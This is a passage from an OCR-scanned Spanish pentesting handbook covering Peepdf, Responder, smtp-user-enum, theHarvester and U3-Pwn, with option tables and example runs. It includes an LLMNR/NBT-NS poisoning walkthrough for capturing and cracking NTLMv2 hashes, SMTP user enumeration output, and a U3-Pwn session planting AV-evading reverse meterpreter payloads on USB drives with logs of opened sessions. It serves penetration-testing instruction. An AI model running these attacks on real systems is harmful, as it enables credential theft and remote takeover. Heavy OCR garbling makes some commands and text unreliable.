'Bvisio.peercoin.address', 'Bvisio.shal', 
'i3visio.sha256', 'Bvisio.uri'] 

-R<regular expression> 

—new regexp <regular_expression> 

Agregar una nueva expresión regular, por ejemplo, 
para propósitos de prueba. 

-i <path to input folder> 

—inputfolder <path_to_input_folder> 

Ruta a la carpeta para analizar. 

-w <url>, —web <url> 

URF para ser recuperada y analizada. 






Argumentos de procesamiento 
Configurando los parámetros de procesamiento. 


-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los archivos de resumen. 
Predeterminado: XES 

-0 <path_to_output_folder> 

—outputfolder <path_to_output_folder> 

Carpeta de salida para los documentos generados. 
Mientras que si las rutas no existen, usufy.py 
intentará crearlas. Si este argumento no se 
proporciona, el usuario NO anotará ningún dato. 

-V <verbosity>, —verbose <verbosity> 

Seleccionar el nivel de verbosidad: 0 - none; 1 - 
normal (por defecto); 2 - debug. 

-E <alternative header file> 

—file header <alternative header file> 

Encabezado para los nombres de archivo de salida 
que se generarán. Si no se proporcionó ninguno, se 
utilizará lo siguiente: profiles.<extension>. 

-q, —quiet 

Pidiendo al programa que no muestre ninguna 
salida. 

-E <path_to_log_folder 
—logfolder <path_to_log_folder 

Ruta a la carpeta de registro. Si no se proporcionó 
ninguno, se supone ./logs. 

—recursive 

Variable para decirle al sistema que realice una 
búsqueda recursiva en el árbol de carpetas. 


Otros argumentos: Mostrar la información adicional sobre este programa. 

-h, —help muestra esta ayuda y sale. 

—versión muestra la versión del programa y sale. 

Módulo alias generator 

Uso: alias_generator [-n <NAME>] [-si <SURNAME_1>] [-s2 <SURNAME_2>] 
[-C <CITY>] [-C <COUNTRY>] [-y <YEAR>] 

[-0 <path_to_output_fde>] [—numbers] [—common words] 

[—leet] [—locales] [—extra words EXTRA WORDS] [-h] 

[—versión] 




85. Peepdf 


Peepdf es una herramienta para el análisis forensic de documentos pdf. La mayoria de los ataques 
de ingeniería social utilizan un documento PDF malicioso incrustado con Scripts de Java y shell- 
codes. Este programa puede analizar objetos sospechosos y flujos de datos dentro de un documento 
PDF. Con algunas extensiones instaladas, un investigador de seguridad puede analizar los Scripts 
Java y los shell-codes en detalle. 

Las principales funcionalidades de peepdf son las siguientes: 

Análisis: 

• Decodiflcaciones: hexadecimales, ocíales, objetos de nombre 

• Más nitros usados 

• Referencias en objetos y donde se hace referencia a un objeto. 

• Búsqueda de cadenas (incluidas las secuencias) 

• Estructura física (compensaciones) 

• estructura de árbol lógico 

• Metadatos 

• Modiflcaciones entre versiones (registro de cambios) 

• Objetos comprimidos (secuencias de objetos) 

• Análisis y modiflcación de JavaScript (PyV8): escapar, reemplazar, unir 

• Análisis de código de shell (Libemu python wrapper, pylibemu) 

• Variables (comando de conflguración) 

• Extracción de versiones antiguas del documento. 

• Fácil extracción de objetos, código JavaScript, códigos de shell (>, », $>, $ ») 

• Comprobar hashes en VirusTotal 
Creación / Modiflcación: 

• Creación básica de PDF 

• Creación de PDF con JavaScript ejecutado cuando se abre el documento 

• Creación de flujos de objetos para comprimir objetos. 

• PDF integrados 

• Ofuscación de cadenas y nombres 

• Salida de PDF con formato incorrecto: sin endobj, basura en el encabezado, encabezado 
incorrecto ... 

• Modiflcación de flltros 

• Modiflcación de objetos 

Puede extraer todos los metadatos y flujos de datos dentro del documento para que un investigador 
forense pueda usar esto con fines de comparación de patrones o para analizar el shellcode o 
simplemente para extraer los metadatos y detectar la presencia de código malicioso y usarlo como 
evidencia. 

Uso: peepdf <opciones> PDF-FILE 
Opciones 


-h, —help 

Mostrar este mensaje de ayuda y salir 

-i, —interactive 

Establece el modo consola. 

-s SCRIPTFILE 
-load-script=SCRIPTFILE 

Cargar los comandos almacenados en el archivo 
especificado y los ejecuta. 

-c, —check-vt 

Comprueba el hash del flchero PDF en VirusTotal. 





-f, —force-mode 

Establecer el modo de análisis de fuerza para ignorar los 
errores. 

-1, —loose-mode 

Establecer el modo de análisis loose para capturar objetos 
con formato incorrecto. 

-m, —manual-analysis 

Evita el análisis automático de JavaScript. Util con los 
bucles eternos como like heap spraying. 

-g, —grinch-mode 

Evitar la salida coloreada en la consola interactiva. 

-V, —versión 

Muestra el número de versión del programa. 

-X, — xml 

Muestra la información del documento en formato XME. 

-j, -json 

Muestra la información del documento en formato JSON 

-C COMMANDS 
—command=COMMANDS 

Especifica un comando de la cónsola interactiva para que 
sea ejecutado 


Consola interactiva 

Para ello ejecutar peepdf -i y aparece el prompt PPDF> 

A continuación se detallan cada uno de los comandos disponibles. 

Comando bytes 

Uso; bytes $oífset $num_bytes [$file] 

Muestra o almacena en $num_bytes del archivo especificado a partir de $offset 

Comando changelog 

Uso; changelog [$version] 

Muestra el registro de cambios del documento o la versión del documento. 

Comando create 

Uso; create pdf simple|(open_actionjs [$js_fde]) 

Crea un nuevo archivo PDF simple o uno con código JavaScript a ejecutar al abrir el archivo. Es 
posible especificar el archivo donde se almacena el código JavaScript o hacerlo manualmente. 
Uso; create object stream [$version] 

Crea una secuencia de objetos que elige los objetos que se van a comprimir. 

Comando decode 

Uso; decode variable $var_name $filterl [$filter2 ...] 

Uso; decode file $file_name $filterl [$filter2 ...] 

Uso; decode raw SofFset $num_bytes $filterl [$filter2 ...] 

Uso; decode string $encoded_strmg $fdterl [$fdter2 ...] 

Decodifica el contenido de la variable, archivo u octetos sin formato especificados utilizando los 
siguientes filtros o algoritmos; 
base64,b64; Base64 
asciihex,ahx; /ASCIIHexDecode 
ascn85,a85; /ASCII85Decode 
Izw; /LZWDecode 
fiatedecode,fi; /FlateDecode 
runlength,rl; /RunLengthDecode 
ccittfax,ccf; /CCITTFaxDecode 


Comando decrypt 




Uso; decrypt $password 

Desencripta el fichero con la contraseña especificada 

Comando embed 

Uso: embed [-x] $fdename [$fde_type] 

Incrusta el archivo especificado en el archivo PDF real. El tipo predeterminado es "aplicación / 
pdf. 

Opciones: -x: el archivo se ejecuta cuando se abre el archivo PDF real 

Comando encode 

Uso: encode variable $var_name $filterl [$filter2 ...] 

Usage; encode file $file_name $filterl [$filter2 ...] 

Uso: encode raw $oífset $num_bytes $filterl [$filter2 ...] 

Uso; encode string $my_strmg $filterl [$filter2 ...] 

Codifica el contenido de la variable, archivo u octetos sin formato especificados utilizando los 
siguientes filtros o algoritmos: 
base64,b64: Base64 
asciihex,ahx: /ASCIIHexDecode 
Izw: /LZWDecode 
fiatedecode,fi; /FlateDecode 

Comando encode strings 

Uso: encode_strmgs [$object_id|trailer [$version]] 

Codifica las cadenas y los nombres incluidos en el archivo, objeto o tráiler 

Comando encrypt 

Uso: encrypt [$password] 

Encripta el archivo con la contraseña predeterminada o especificada 

Comando errors 

Uso: errors [$object_id|xref|trailer [$version]] 

Muestra los errores del ficherou objeto (object id, xref, tráiler) 

Comando exit 

Uso: exit 

Salir del modo interactivo 

Comando extract 

Uso: extract urijs [Sversion] 

Extrae todos los elementos de tipo dados de la versión especificada después de ser decodificados 
descifrados si es necesario 

Comando filters 

Uso: filters $object_id [Sversion] [$filterl [$filter2 ...]] 

Muestra los filtros encontrados en el objeto de flujo o establece los filtros en el objeto. El primer 
filtro se usa primero. Eos valores válidos para los filtros son los siguientes: 
none; No filters 

asciihex,ahx: /ASCIIHexDecode 
Izw: /LZWDecode 
fiatedecode,fi: /FlateDecode 



Comando hash 

Uso: hash object|rawobject|stream|rawstream $object_id [$version] 

Uso: hash raw $oífset $num_bytes 
Uso: hash file $file_name 
Uso: hash variable $var_name 
Uso: hash string $my_string 

Genera el hash (MD5/SHA1/SHA256) de la fuente espeeificada: oetetos sin formato del fichero, 
objetos y streams y el contenido de los ficheros y variables 

Comando help 

Uso: help [$command] 

Muestra los comandos disponibles o su uso. 

Comando info 

Uso: info [$object_id|xref|trailer [$version]] 

Muestra la información del fichero u objeto ($object_id, xref, tráiler) 

Comando jsanalyse 

Uso: js_analyse variable $var_name 

Uso: js_analyse file $file_name 

Uso: js_analyse object $object_id [$version] 

Uso: js_analyse string $javascript_code 

Analiza el código JavaScript almacenado en una cadena, variable, fichero u objeto especificado 

Comando jsbeautify 

Uso: js_beautiíy variable $var_name 

Uso: js_beautiíy file $file_name 

Uso: js_beautiíy object $object_id [$version] 

Uso: js_beautiíy string $javascript_code [$version] 

Embellece el código JavaScript almacenado en la variable, archivo u objeto especificado 

Comando jscode 

Uso: js_code $object_id [$version] 

Muestra el código JavaScript encontrado en el objeto 

Comando jseval 

Uso: js_eval variable $var_name 

Uso: js_eval file $file_name 

Uso: js_eval object $object_id [$version] 

Uso: js_eval string $javascript_code 

Evalúa el código JavaScript almacenado en la variable, fichero, objeto o código raw especificado en 
un contexto global 

Comando jsjjdecode 

Uso: jsjjdecode variable $var_name 

Uso: jsjjdecode file $file_name 

Uso: jsjjdecode object $objectjd [$version] 

Uso: jsjjdecode string $encodedjs_code [$version] 

Decodifica el código JavaScript almacenado en la variable, archivo u objeto especificado utilizando 
el algoritmo jjencode/decode de Yosuke Hasegawa 



Comando jsjoin 

Uso: jsjoin variable $var_name 
Uso: jsjoin file $file_name 
Uso: jsjoin string $my_string 

Une algunas eadenas separadas por eomillas y almaeenadas en la variable o arehivo especifieado en 
una úniea. Ejemplo: 

aux = "% u65" + "54" + "% u74" + "73" 

> jsjoin variable aux 
% u6554% u7473 

Comando jsunescape 

Uso: js_uneseape variable $var_name 
Uso: js_uneseape fde $fde_name 
Uso: js_unescape string $escaped_string 

Desempaqueta los earaeteres eseapados almaeenados en la variable o arehivo espeeifieado 
Ejemplo: aux = "%u6554%u7473" 

> js_unesoape variable aux 

54 65 73 74 |Test| 

Comando jsvars 

Uso: js_vars [$var_name] 

Muestra las variables Javaseript definidas en el eontexto de ejecueión o el eontenido de la variable 
espeeifieada. 

Comando log 

Uso: log 

Muestra el estado aetual de registro 
Uso: log stop 
Parar el registro 
Uso: log $log_fde 

Inieiar el registro en el fiehero espeeifieado 

Comando malformed output 

Uso: malformed_output [$optionl [$option2 ...] [$header_file]] 

Habilita la salida con formato incorrecto al guardar el archivo: 

0: Elimina todas las opciones con formato incorrecto. 

1 [header file]: habilita todos los trucos implementados. Opción por defecto. 

2 [header file]: coloca el encabezado predeterminado o especificado antes del encabezado 
PDE. 

3: Elimina todas las etiquetas "endobj". 

4: Elimina todas las etiquetas "endstream". 

5: Elimina la sección "xref. 

6: Encabezado incorrecto:% PDE-1 

Comando metadata 

Uso: metadata [$version] 

Muestra los metadata del documento o la versión del documento 

Comando modify 

Uso: modify object|stream $objectjd [$version] [$file] 

Modifica el objeto o la secuencia especificada. Es posible usar un archivo para recuperar el 
contenido de la transmisión (SOLO para el contenido de la transmisión). 



Comando object 

Uso: object $object_id [$version] 

Muestra el contenido del objeto después de ser decodificado o desencriptado. 

Comando offsets 

Uso: offsets [$version] 

Muestra el mapa físico del archivo o la versión especifícada del documento. 

Comando open 

Uso: open [-fí] $fíle_name 

Abre y analiza el archivo especifícado. 

Opciones: 

-f: establece el modo de análisis forzado para ignorar los errores 
-1: establece el modo de análisis suelto para archivos problemáticos 

Comando quit 

Uso: quit 

Salir del modo interactivo 

Comando rawobject 

Uso: rawobject [$object_id|xref|trailer [$version]] 

Muestra el contenido del objeto sin ser decodificado ni desencriptado (object id, xref, tráiler) 

Comando references 

Uso: references tojin $object_id [Sversion] 

Muestra las referencias en el objeto o al objeto en la versión especifícada del documento 

Comando replace 

Uso: replace all Sstringl $strmg2 
Reemplaza $stringl con $string2 en todo el fíchero PDF 
Uso: replace variable $var_name Sstringl $strmg2 
Uso: replace fíle $fíle_name Sstringl $strmg2 

Reemplaza Sstringl con $strmg2 en el contenido de la variable o fíchero especifícados 

Comando reset 

Uso: reset 
Limpia la cónsola 
Uso: reset $var_name 

Resetea el valor de la variable a su valor por defecto si es aplicable 

Comando save 

Uso: save [$fíle_name] 

Guarda el fichero en el disco 

Comando save version 

Uso: save_version $version $fíle_name 

Guarda la versión del fíchero seleccionado en el disco 

Comando sctest 

Uso: sctest [-v] variable $var_name 
Uso: sctest [-v] fíle $fíle_name 



Uso: sctest [-v] raw $oífset $num_bytes 

Contenedor de la herramienta setest (libemu) para emular shelleodes. Con -v el resultado es 
detallado, prepararse para toneladas de datos 

Comando search 

Uso: seareh [hex] Sstring 

Busear la eadena espeeifieada o la eadena hexadeeimal en los objetos (seeueneias deeodifieadas y 
eifradas ineluidas) 

Ejemplo: seareh hex \x34\x35 

Comando set 

Uso: set [$var_name $var_value] 

Estableeer el valor de la variable espeeifieado o erea uno eon este valor. Sin parámetros se muestran 
todas las variables. 

Variables espeeiales: 

header file: solo leetura. Espeeifiea el eneabezado del arehivo que se utilizará euando las 
'malformed_options' estén aetivas. 

malformed options: solo leetura. Variable para almaeenar las opeiones mal formadas utilizadas para 
guardar el arehivo. 

output limit: variable para espeeifiear el número máximo de líneas que se mostrarán a la vez 
euando la salida es larga (sin límite = -1). Por defeeto no hay límite, 
vt key: elave Api de VirusTotal. 

Comando show 

Uso: show $var_name 

Muestra el valor de las variables espeeifieadas. 

Eas variables espeeiales son: header file, malformed options, output, output limit, vt key 

Comando stream 

Uso: stream $objeet_id [$version] 

Muestra el eontenido del flujo de objetos de la versión espeeifieada después de ser deeodifieado y 
deseifrado (si es neeesario) 

Comando tree 

Uso: tree [$version] 

Muestra el gráfieo de árbol del arehivo o la versión espeeifieada. 

Comando vtcheck 

Uso: vteheek 

Uso: vteheek objeet|rawobjeet|stream|rawstream $objeet_id [$version] 

Uso: vteheek raw Soflfset $num_bytes 
Uso: vteheek file $file_name 
Uso: vteheek variable $var_name 

Comprueba el hash de la fuente espeeifieada en VirusTotal: los oetetos sin proeesar del arehivo, los 
objetos y las seeueneias, y el eontenido de los arehivos o las variables. 

Si no se espeeifiean parámetros, se verifieará el hash del doeumento PDE. 

*** NOTA: ¡NO SE ENVÍA NINGÚN CONTENIDO A VIRUSTOTAE, SOEO HASHES! 

*** NOTA: Neeesita una elave API de VirusTotal para usar este eomando. 

Comando xor 

Uso: xor streamjrawstream $objeot_id [Sversion] [$key] 

Uso: xor raw Soflfset $num_bytes $key 



Uso: xor file $file_name $key 
Uso: xor variable $var_name $key 

Realiza una operaeión XOR utilizando la elave espeeifieada eon el eontenido del arehivo o variable 
espeeifieada, oetetos sin proeesar del arehivo o finjo / flujo sin proeesar. 

Si no se especifica la clave, se realiza una XOR de fuerza bruta. 

Comando xor search 

Uso: xor_search [-1] stream|rawstream $object_id [Sversion] $string_to_search 
Uso: xor_search [-1] raw Soflfset $num_bytes $string_to_search 
Uso: xor_search [-1] file $file_name $string_to_search 
Uso: xor_search [-1] variable $var_name $string_to_search 

Busca la cadena especificada en el resultado de una operación de fuerza bruta XOR con el 
contenido del archivo o variable especificada, los octetos sin procesar del archivo o flujo / flujo sin 
procesar. La salida muestra los offsets donde se encuentra la cadena. Es una búsqueda sensible a 
mayúsculas y minúsculas pero es posible hacerlo insensible usando -i. 

Ejemplos: 

En Internet se pueden encontrar documentos relacionados con la implementación de un virus o 
similar en un documento pdf. Una de las herramientas más empleadas en el análisis de los ficheros 
pdf es precisamente peepdf 



86. Responder 


Un LLMNR & NBT-NS Spoofing Attack es un ataque elásico de red interna que todavía funciona 
hoy en día debido a la baja conciencia y al hecho de que está habilitado de forma predeterminada en 
Windows. Este documento explica que es un ataque LLMNR y NBT-NS, como usar el ataque en 
una prueba de penetración y finalmente como proteger las redes contra la vulnerabilidad. 

Cuando falla una solicitud del servidor de nombres DNS, los sistemas Microsoft Windows usan 
Link-Local Multicast Ñame Resolution (LLMNR) y el servicio de nombre de BIOS de red (NBT- 
NS) para la resolución de nombre de reserva. 

Si el nombre DNS no se resuelve, el cliente realiza una transmisión UDP no autenticada a la red 
preguntando si algún otro sistema tiene el nombre que está buscando. El hecho de que este proceso 
no esté autenticado y se transmita a toda la red permite que cualquier máquina de la red responda y 
afirme ser la máquina objetivo. 

Uso; responder -I <interfaz> <opciones> 

Opciones: 


—versión 

Mostrar el número de versión del programa y salir 

-h, —help 

Mostrar la ayuda y salir 

-A, —analyze 

Modo analyze. Esta opción permite ver las solicitudes 
NBT-NS, BROWSER, LLMNR sin responder. 

-I ethO, —interface=ethO 

Interfaz de red a usar. Se puede usar ALL' como un 
comodín para todas las interfaces 

-i 10.0.0.21 
-ip=10.0.0.21 

IP local a usar. Solo para OSX 

-e 10.0.0.22 
—extemalip= 10.0.0.22 

Envenenar todas las solicitudes con otra dirección IP que la 
de Responder. 

-b, —basic 

Devolver una autenticación HTTP básica. 

Predeterminado: NTLM 

-r, —wredir 

Habilitar las respuestas para las consultas de sufijos wredir 
de NETBIOS. Responder a wredir probablemente romperá 
cosas en la red. Predeterminado: Lalse 

-d, —NBTNSdomain 

Habilitar las respuestas para las consultas de sufijos del 
dominio de NETBIOS. Responder a los sufijos de dominio 
probablemente romperá cosas en la red. 

Predeterminado: Ealse 

-f, —fmgerprint 

Esta opción le permite tomar un fingerprint de un 
dispositivo que emitió una consulta NBT-NS o LLMNR. 

-w, —wpad 

Iniciar el servidor proxy fraudulento WPAD. El valor 
predeterminado es false 

-u UPSTREAMPROXY, 

—upstream- 

proxy=UPSTREAM_PROXY 

Proxy HTTP en sentido ascendente utilizado por el proxy 
WPAD fraudulento para solicitudes salientes. Pormato; 
host:puerto 

-L, —LorceWpadAuth 

Porzar la autenticación NTLM/básica en la recuperación de 





archivos wpad.dat. Predeterminado: false 

-P, —ProxyAuth 

Eorzar la autentieaeión NTLM (transparentej/básiea 
(solieitud) para el proxy. WPAD no neeesita estar ON. Esta 
opeión es altamente efeetiva euando se eombina eon -r. 
Predeterminado: false 

-Im 

Eorzar el LM hash downgrade para Windows XP / 2003 y 
versiones anteriores. Predeterminado: false 

-V, —verbose 

Modo verbose 


¿Qué es un ataque de envenenamiento LLMNR / NBT-NS? 

Al escuchar las transmisiones de LLMNR y NetBIOS, es posible enmascararse a medida que la 
máquina (spoof) con la que el cliente intenta autenticarse erróneamente. Después de aceptar la 
conexión, es posible usar una herramienta como responder.py o Metasploit para reenviar las 
solicitudes a un servicio no autorizado (como SMB TCP; 137) que realiza el proceso de 
autenticación. Durante el proceso de autenticación, el cliente enviará al servidor no autorizado un 
hash NTLMv2 para que el usuario intente autenticarse. Este hash se captura en el disco y se puede 
descifrar sin conexión con una herramienta como Hashcat o John the Ripper (TJR) o usarlo en un 
ataque pass-the-hash. LLMNR y NBT-NS están habilitados de forma predeterminada en Windows y 
con la conciencia de que este ataque es bastante bajo, tiene una buena posibilidad de reunir 
credenciales en una prueba de penetración interna. Dejar el responder.py ejecutándose durante un 
tiempo mientras trabaja con otros vectores de ataque. 

El siguiente diagrama muestra el escenario típico para este tipo de ataque en el que un usuario 
escribe incorrectamente un nombre de servidor. 

Ataque de envenenamiento LLMNR / NBT-NS 

[*] El usuario envía una dirección de recurso compartido SMB incorrecto WSNAREOl 
[*] El servidor DNS responde con WSNAREOl - NOT FOUND 
[*] El cliente realiza la transmisión LLMNR / NBT-NS 
[*] El responder le dice al cliente que es SNAREOl y acepta el hash NTLMv2 
[*] El responder envía un error al cliente, por lo que el usuario final no es más sabio y simplemente 
piensa que tiene el nombre compartido incorrecto 

Ejemplo práctico 

Ejecutar responder.py, usar la propia interfaz local y la dirección IP de la forma siguiente: 

Code: 

python responder.py -i 192.168.210.145 -I ethO 
Ahora responder.py debe quedar a la escucha: 

Después de que se ejecute responder.py, simular un usuario escribiendo el nombre del servidor 
SMB incorrecto usando SNAREOl en lugar de SHAREOl. 

Dentro de unos segundos después de que el cliente difunde el nombre de servidor incorrecto, 
responder.py respondió a la solicitud de difusión y escribió el hash NTLMv2 en el disco. 


El siguiente error se devuelve al equipo cliente desde responder.py: 
“Windows cannot access WSNAREOl” 




El último paso es descifrar el hash NTLMv2. Dependiendo de la complejidad de la política de 
contraseñas dentro del entorno de destino, esto podría llevar algún tiempo, ocl-hashcat sería una 
mejor opción para el descifrado sin conexión donde se sabe/ sospecha que las políticas de 
contraseña son más seguras. Como la contraseña es intencionalmente insegura dentro del entorno 
del laboratorio de pruebas, John The Ripper se usa para descifrar el hash NTLMv2: 



87. Smtp-user-enum 


smtp-user-enum es una herramienta para enumerar las euentas de usuario a nivel de sistema 
operativo en Solaris via el servieio SMTP. La enumeración se realiza inspeccionando las 
respuestas a los comandos VRFY, EXPN y RCPT TO. Se podría adaptar para trabajar contra otros 
deamons SMTP vulnerables, pero esto no se ha hecho a partir de vl.O. 

Uso: smtp-user-enum [opeiones] (-u username | -U file-of-usernames ) (-t host | -T file-of-targets ) 


Opeiones: 


-m n 

Número máximo de procesos. Por defecto: 5 

-M mode 

Método a utilizar para adivinar el nombre de usuario EXPN, VRFY o 

RCPT. Predeterminado: VRFY 

-u user 

Compobar si el usuario existe en el sistema remoto 

-f addr 

Dirección de correo MAIL FROM. Usado solo en el modo "RCPT TO" 

-D dom 

Dominio para adjuntar a la lista de usuarios suministrada para hacer 
direcciones de correo electrónico. Valor predeterminado: none. Utilice esta 
opción cuando desee adivinar direcciones de correo electrónico válidas en 
lugar de solo nombres de usuario. 

-U file 

Archivo de nombres de usuario para verificar a través del servicio SMTP. 

-t host 

Servidor ejecutando servicio SMTP 

-T file 

Archivo de nombres de host ejecutando el servicio SMTP 

-p port 

Puerto TCP en el que se ejecuta el servicio SMTP. Predeterminado: 25 

-d 

Modo depuración 

-tn 

Espere un máximo de n segundos para responder. Predeterminado: 5 

-V 

Modo verbose 

-h 

Este mensaje de ayuda 


Ejemplo 

Para usar smtp-user-enum para enumerar nombres de usuario válidos utilizando el eomando VRFY, 

primero preparar una lista de nombres de usuario (users.txt), por ejemplo eon el contenido 

admin 

adminl 

administrator 

root 

support 

mail 

y ejecutar la herramienta de la siguiente manera: 

$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1 

Starting smtp-user-enum vl.O ( http://pentestmorLkey.net/tools/smtp-user-enum ) 


Sean Information 


Mode.VRFY 

Worker Processes.5 








Usernames file. users.txt 

Target eount.1 

Username eount.47 

Target TCP port.25 

Query timeout.5 sees 

Relay Server.Not used 


######## Sean started at Sun Jan 21 18:01:50 2007 ######### 

root@10.0.0.1: Exists 

bin@10.0.0.1: Exists 

daemon@ 10.0.0.1: Exists 

lp@10.0.0.1: Exists 

adm@10.0.0.1: Exists 

uuep@10.0.0.1: Exists 

postmaster@10.0.0.1: Exists 

nobody@10.0.0.1: Exists 

ftp@10.0.0.1: Exists 

######## Sean eompleted at Sun Jan 21 18:01:50 2007 ######### 
9 results. 

47 quedes in 1 seeonds (47.0 queries / see) 









88. TheHarvester 


TheHarvester ha sido desarrollado en python por Christian Martorella. Es una herramienta que nos 
proporeiona informaeión sobre euentas de eorreo eleetrónieo, nombres de usuario y nombres de 
dispositivos/subdominios de diferentes fuentes públicas, como los motores de búsqueda y el 
servidor de claves PGP. 

Esta herramienta está diseñada para ayudar al probador de penetración en una etapa anterior y es un 
método efectivo, simple y fácil de usar. Eas fúentes compatibles son: 

• Google - correos electrónicos, subdominios 

• Google profiles - Emplea nombres 

• Bing search - correos electrónicos, subdominios/hostnames, host virtuales 

• Pgp servers - correos electrónicos, subdominios/hostnames 

• Einkedin - Emplea nombres 

• Exalead - correos electrónicos, subdominio/hostnames 
Uso: theharvester <opciones> 

Opciones 


-d 

Dominio para buscar o nombre de la empresa 

-b 

Euente de datos: google, googleCSE, bing, bingapi, pgp, linkedin, 
google-profdes, jigsaw, twitter, googleplus, all 

-s 

Comenzar en el resultado número X. Predeterminado: 0 

-V 

Verificar el nombre del dispositivi a través de la resolución DNS y buscar 
dispositivos virtuales 

-f 

Guardar los resultados en un archivo HEME y XME 

-n 

Realizar una consulta inversa de DNS en todos los rangos descubiertos 

-c 

Realizar una fuerza bruta de DNS para el nombre de dominio 

-t 

Realizar un descubrimiento de expansión DNS TLD 

-e 

Usar este servidor DNS 

-1 

Eimitar el número de resultados para trabajar. El bing va de 50 a 50 
resultados, Google de 100 a 100 y pgp no usa esta opción 

-h 

Usar la base de datos SHODAN para consultar los hosts descubiertos 


Ejemplo 1 

root@kali:'-'# theharvester -d sixthstartech.com -1 300 -b google 
* * 
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* thcHarvester Ver. 3.0.6 

* Coded by Christian Martorella 

* Edge-Security Research 







* cmartorella@edge-security.com * 

found supported engines 

[-] Starting harvesting process for domain: sixthstartech.com 
[-] Searching in Google: 

Searching O results... 

Searching 100 results... 

Searching 200 results... 

Searching 300 results... 

Harvesting results 
No IP addresses found 

Ejemplo 2 

root@kali:'-'# theharvester -d sixthstartech.com -1 300 -b all 

Waming: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing 
SSL sites. Check Wfuzz's documentation for more Information. 
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* theHarvester Ver. 3.0.6 * 

* Coded by Christian Martorella * 

* Edge-Security Research * 

* cmartorella@edge-security.com * 


found supported engines 

[-] Starting harvesting process for domain; sixthstartech.com 

Eull harvest on sixthstartech.com 
[-] Searching in Google.. 

Searching 0 results... 

Searching 100 results... 

Searching 200 results... 

Searching 300 results... 

[-] Searching in PGP Key server.. 

Searching PGP results... 

[-] Searching InNetcraft server.. 

Searching Netcraft results.. 

[-] Searching in ThreatCrowd server.. 

Searching Threatcrowd results.. 

[-] Searching in CRTSH server.. 

Searching https://crt.sh?id=2927714158 
Searching https://crt.sh?id=2890175811 
Searching https://crt.sh?id=2852187082 



Searching https://crt. sh?id=3 30050142 
Searching https://crt. sh?id= 17962179 
Searching CRT.sh results.. 

[-] Searching in Virustotal server.. 

Searehing Virustotal results.. 

[-] Searehing in Bing.. 

Searehing 50 results... 

Searehing 100 results... 

Searehing 150 results... 

Searehing 200 results... 

Searehing 250 results... 

Searching 300 results... 





89. U3-Pwn 


U3-Pwn es una herramienta diseñada para automatizar la inyección de payloads de Metasploit en 
dispositivos USB de Sandisk con instalación de software U3 predeterminada. Esto se realiza 
eliminando el archivo iso original del dispositivo y creando una nueva iso con funciones de 
ejecución automática. 

1. Genérate & Replace Iso Image. 

2. Generate & Replace With Custom Exe. 

3. Eind Out U3 SanDisk Device Information. 

4. Replace Iso Image With Original U3 Iso. 

5. SanDiskUsb Compatibility Eist 

6. About U3-Pwn & Disclaimer. 

V.Exit U3-Pwn 

Enter the number: 3 

What payload do you want to generate: 

Ñame: Description: 

1. Windows Shell Reverse TCP AllPorts Windows Meterpreter (Reflective Injection), Reverse 
All-Port TCP Stager. 

2. Windows Reverse_TCP Meterpreter AllPorts Windows Command Shell, Reverse All-Port TCP 
Stager. 

Enter the number: 2 

What encoder would you Itke to try and bypass AV with. 

Ñame: 

1. avoid utfS tolower 

2. shikata ga nai 

3. alpha mixed 

4. alpha upper 

5. call4_dword_xor 

6. countdown 

7. fnstenv_mov 

8. jmpcalladditive 

9. nonalpha 

10. nonupper 

11. unicode mixed 

12. unicode upper 
Enter the number: 2 

Enter Ip Address for reverse listener: 10.254.254.60 
How many devices would to like to change iso image on 2,4,6: 4 
Would you like to start a listener y/n: y 
Generating Shellcode Picase Walt... 

Enter the device to change iso image on (example /dev/sdel): /dev/sdel 
Enter next device: /dev/sdbl 
Enter next device: /dev/sdel 



Enter next device: /dev/sddl 

OK 

OK 

OK 

OK 


100 % 

100 % 

100 % 

100 % 


Starting Msfconsole 

resource (rc/4.rc)> use multi/handler 

resource (rc/4.rc)> set payload windows/meterpreter/reverse_tep_allports 
payload => windows/meterpreter/reverse_tcp_allports 
resource (rc/4.rc)> set LPORT 1 
LPORT =>1 

resource (rc/4.rc)> set LHOST 0.0.0.0 
LHOST => O.O.O.O 
resource (rc/4.rc)> exploit -j 
[*] Exploit running as background job. 
resource (rc/4.rc)> set EPORT 2 
EPORT => 2 

resource (rc/4.rc)> exploit -j 

[*] Started reverse handler on O.O.O.O; 1 

[*] Starting the payload handler... 

[*] Exploit running as background job. 
resource (rc/4.rc)> set EPORT 3 
EPORT => 3 

resource (rc/4.rc)> exploit -j 

[*] Started reverse handler on 0.0.0.0:2 

[*] Exploit running as background job. 

[*] Starting the payload handler... 

[*] Started reverse handler on 0.0.0.0:3 
[*] Starting the payload handler... 
msf exploit(handler) > 

[*] Sending stage (752128 bytes) to 10.254.254.61 

[*] Meterpreter session 1 opened (10.254.254.60:1 -> 10.254.254.61:51966) at 2012-04-13 
14:33:48 +0100 

[*] Sending stage (752128 bytes) to 10.254.254.81 

[*] Meterpreter session 2 opened (10.254.254.60:2 -> 10.254.254.81:52465) at 2012-04-13 
14:34:36+0100 

[*] Sending stage (752128 bytes) to 10.254.254.76 

[*] Meterpreter session 3 opened (10.254.254.60:3 -> 10.254.254.76:1034) at 2012-04-13 14:38:03 
+0100 

[*] Sending stage (752128 bytes) to 10.254.254.132 

[*] Meterpreter session 4 opened (10.254.254.60:3 -> 10.254.254.132:49168) at 2012-04-13 

14:46:16+0100 

msf exploit(handler) > 

msf exploit(handler) > sessions -1 

Active sessions 


Id Type Information Connection 





1 meterpreter x86/win32 CARETOWER\michaelJ @ PENTEST-PC 10.254.254.60:1 -> 
10.254.254.61:51966 (10.254.254.61) 

2 meterpreter x86/win32 CARETOWER\miehaelJ @ CTTRAININGOl 10.254.254.60:2 - 
10.254.254.81:52465 (10.254.254.81) 

3 meterpreter x86/wm32 ROOT-172737B633\Admmistrator @ ROOT-172737B633 
10.254.254.60:3 -> 10.254.254.76:1034 (10.254.254.76) 

4 meterpreter x86/wm32 WlN2K8DC\Admmistrator @ W1N2K8DC 10.254.254.60:4-> 
10.254.254.132:49168 (10.254.254.132) 





